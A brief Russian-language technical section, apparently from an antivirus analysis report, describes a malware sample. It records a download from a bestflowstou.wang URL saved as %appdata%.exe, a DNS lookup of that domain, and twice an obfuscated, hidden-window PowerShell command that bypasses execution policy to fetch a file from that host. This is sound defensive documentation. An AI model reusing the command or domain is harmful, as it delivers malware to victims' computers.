Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wEr^s^heL^l^.e^Xe -E^xECu^T^I^ON^polIC^y ^B^yP^AsS ^-NOP^R^O^Fil^e^ -wiND^oW^STyle^ ^H^i^d^De^N (^nE^w^-O^BjE^c^T sy^sTem.Net^.^WE^bcliEN^T).^d^OwNloa^dfilE('http://bestflowstou....
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /c "Po^wEr^s^heL^l^.e^Xe -E^xECu^T^I^ON^polIC^y ^B^yP^AsS ^-NOP^R^O^Fil^e^ -wiND^oW^STyle^ ^H^i^d^De^N (^nE^w^-O^BjE^c^T sy^sTem.Net^.^WE^bcliEN^T).^d^OwNloa^dfilE('http://bestflowstou....' (со скрытым окном)